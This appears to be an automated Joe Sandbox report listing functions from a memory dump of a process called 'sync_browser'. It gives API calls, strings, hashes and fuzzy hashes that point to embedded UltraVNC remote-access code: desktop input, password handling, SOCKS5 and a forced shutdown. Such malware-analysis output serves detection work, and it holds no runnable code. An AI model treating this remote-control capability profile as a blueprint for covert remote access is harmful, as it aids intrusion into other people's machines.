Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$ClipboardCloseInput
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2872304593-3977938048
Opcode ID: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
Instruction ID: 40c7b5da8780a3fe044ccb6b008662e18a2568e30f85595f79346524765c7914
Opcode Fuzzy Hash: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
Instruction Fuzzy Hash: 1A12D332A086D186EBA4AB25C8587FDA7A1EB85F88FC44132DE4D4B796CF3CD551C720

Function 00007FF7D59878E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D598792E
RegQueryValueExA.ADVAPI32 ref: 00007FF7D598796A
RegQueryValueExA.ADVAPI32 ref: 00007FF7D59879B2
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D5987A02

Strings

UseRegistry, xrefs: 00007FF7D598791D
admin, xrefs: 00007FF7D5987924
admin_auth, xrefs: 00007FF7D59879E0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileQueryValue$FileModuleNameString
String ID: UseRegistry$admin$admin_auth
API String ID: 3374479654-3376419731
Opcode ID: 252edaa955b2cbd624277fcddc4e8b16f6cd9647470f44b878fedc813ede5e3d
Instruction ID: e131ccde5ee5e7aeed3a92d746fe3e173e31f74ab53fdccddbe834866f066526
Opcode Fuzzy Hash: 252edaa955b2cbd624277fcddc4e8b16f6cd9647470f44b878fedc813ede5e3d
Instruction Fuzzy Hash: 2A31323261DA9282EA54AB11E8447AEF7A4FF88B88FC41036ED8D47B54DF3DD505CB10

Function 00007FF7D5951620 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 323COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF7D595168C

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

EnterCriticalSection.KERNEL32 ref: 00007FF7D5951813
LeaveCriticalSection.KERNEL32 ref: 00007FF7D595183B

Part of subcall function 00007FF7D5952CC0: malloc.LIBCMT ref: 00007FF7D5952D28
Part of subcall function 00007FF7D5952CC0: GetCurrentProcessId.KERNEL32 ref: 00007FF7D5952D6C
Part of subcall function 00007FF7D5952CC0: rand.LIBCMT ref: 00007FF7D5952D90

free.LIBCMT ref: 00007FF7D5951A63
free.LIBCMT ref: 00007FF7D5951AB0

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D595166F
i, xrefs: 00007FF7D5951809
unable to determine legacy authentication method, xrefs: 00007FF7D595173F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
API String ID: 2847437661-1576074771
Opcode ID: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
Instruction ID: b69e9ebceec8d3b02a656a177e734c1f5fdf2a50abb9590aa81888c569e583f6
Opcode Fuzzy Hash: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
Instruction Fuzzy Hash: 22D1A022B0864287FB14EB65D4543BCA7A2EB84B68FD44236DE6E47AD5CF3CD851D320

Function 00007FF7D5987650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722

Strings

Software\UltraVNC, xrefs: 00007FF7D59876B3
UseRegistry, xrefs: 00007FF7D5987678
mslogon, xrefs: 00007FF7D59876F3
admin, xrefs: 00007FF7D598767F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$FileModuleNamePrivateProfile
String ID: Software\UltraVNC$UseRegistry$admin$mslogon
API String ID: 27673491-2056936749
Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction ID: f2758d6c570dd27c0c5ec421cbaa1a03af81ac02110f9779912dd6cd1d853225
Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction Fuzzy Hash: 41212C72518B9287E7609F24F890BAAFB64FB88754FC01136EA8D07A18DF3DD1148B10

Function 00007FF7D5961660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF7D596169D
IsWindowVisible.USER32 ref: 00007FF7D59616B9
GetWindowRect.USER32 ref: 00007FF7D59616CA
IsWindowVisible.USER32 ref: 00007FF7D596172F
GetWindowRect.USER32 ref: 00007FF7D5961744

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$RectVisible$Foreground
String ID:
API String ID: 2499709836-0
Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction ID: edae2cb8d0e7fdbfe06ab3b37fbb4b75556241143db2259f50d4590014b45251
Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
Instruction Fuzzy Hash: 17D16C36B146928FEB14DFB9E4406AC77B2BB48B8CB90423ADE0D67B48DF349495C750

Function 00007FF7D5943550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7D5943569
OpenProcessToken.ADVAPI32 ref: 00007FF7D594357C
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF7D5943594
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D59435C5
GetVersionExA.KERNEL32 ref: 00007FF7D59435DC
ExitWindowsEx.USER32 ref: 00007FF7D59435F1

Strings

SeShutdownPrivilege, xrefs: 00007FF7D594358B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
String ID: SeShutdownPrivilege
API String ID: 337752880-3733053543
Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction ID: 01280dad5f70b2e6f6765b70e84c1e39378a97fe7fd62cad16c028875f409e47
Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction Fuzzy Hash: 02113D71A1868286E754EB60F4557AEB7A0FF84B44FC04036E98E47658DF7CD049CB10

Function 00007FF7D59E7220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7D59F29F7
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7D59F2A16
RtlVirtualUnwind.KERNEL32 ref: 00007FF7D59F2A62
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D59F4917), ref: 00007FF7D59F2AD4
SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D59F4917), ref: 00007FF7D59F2AEC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D59F4917), ref: 00007FF7D59F2AF9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D59F4917), ref: 00007FF7D59F2B12
TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D59F4917), ref: 00007FF7D59F2B20

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction ID: 70654c53d64df1532949fb04206758c56374a5ee989cb1410a0499950029b01f
Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
Instruction Fuzzy Hash: 8331C535918B9286EB54AB54E8407ADBBA4FF84B98FD00136DE8D43765DF7CE044C720

Function 00007FF7D593C0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201networkCOMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF7D593C104

Part of subcall function 00007FF7D59E9500: _errno.LIBCMT ref: 00007FF7D59E9515
Part of subcall function 00007FF7D59E9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E9520

send.WS2_32 ref: 00007FF7D593C191
recv.WS2_32 ref: 00007FF7D593C1C1
send.WS2_32 ref: 00007FF7D593C2A2
recv.WS2_32 ref: 00007FF7D593C2D1

Part of subcall function 00007FF7D593BB70: recv.WS2_32 ref: 00007FF7D593BBAF

Strings

SOCKS5_AUTH, xrefs: 00007FF7D593C0FD, 00007FF7D593C111

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
String ID: SOCKS5_AUTH
API String ID: 788663964-1698957378
Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
Instruction ID: b3bed1daafc556c4d2052df4defa1875140f697420d38c23e9a997c08f8c2532
Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
Instruction Fuzzy Hash: 8981F82261CA42C6F760A769A5406BEE691EF85B98FC42133ED5D476C9EF3CE406C710

Function 00007FF7D5935910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5935944
FindFirstFileA.KERNEL32 ref: 00007FF7D59359E2

Strings

*.dsm, xrefs: 00007FF7D59359C1

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$FindFirstModuleName
String ID: *.dsm
API String ID: 1519589655-1970359449
Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
Instruction ID: 420a524136b89f20b0457a1ba5d8f93b72e8af56b5e337ad92aa5eaeffac63ba
Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
Instruction Fuzzy Hash: 7431522261869586EA649B34A8446AFA790FF88BB4FC05332DE7D436D8DF3CE109C710

Function 00007FF7D59877F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D59878AF

Strings

UseRegistry, xrefs: 00007FF7D598782F
admin, xrefs: 00007FF7D5987836
admin_auth, xrefs: 00007FF7D59878A5

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$FileModuleNameQueryValue
String ID: UseRegistry$admin$admin_auth
API String ID: 1028385882-3376419731
Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
Instruction ID: 79ef6e34172c35b5119788a5250d7a09351e7967e9b2e50500fa0de99c811b90
Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
Instruction Fuzzy Hash: 58214431618A92C7EA50DB10E884AAEB7A4FB88B88FC01036FE4D47B58CF3DD545CB10

Function 00007FF7D59436C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D59436EB
GetForegroundWindow.USER32 ref: 00007FF7D59436FC
ShellExecuteExA.SHELL32 ref: 00007FF7D594373F

Strings

p, xrefs: 00007FF7D59436F3
runas, xrefs: 00007FF7D5943711
-rebootsafemode, xrefs: 00007FF7D5943733

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootsafemode$p$runas
API String ID: 3648085421-4291177908
Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction ID: 9dfb62438138e5e5c64c9de5bbbf74d2041fd258c9c5b9ef49b41df4e79600f2
Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
Instruction Fuzzy Hash: C801E532619B8186E625AF20F49479BB7A4FB88744FC0013AEACD02B28DF3CD158CB10

Function 00007FF7D5987750 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987789
RegCloseKey.ADVAPI32 ref: 00007FF7D59877A0
RegCloseKey.ADVAPI32 ref: 00007FF7D59877B2
RegCloseKey.ADVAPI32 ref: 00007FF7D59877C4

Strings

UseRegistry, xrefs: 00007FF7D5987778
admin, xrefs: 00007FF7D598777F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$FileModuleNamePrivateProfile
String ID: UseRegistry$admin
API String ID: 3032973919-2802730080
Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
Instruction ID: 51e35cdf16d1eb08fc09b949347656e3c3aae090f320a97da1bbd6cd119f5c47
Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
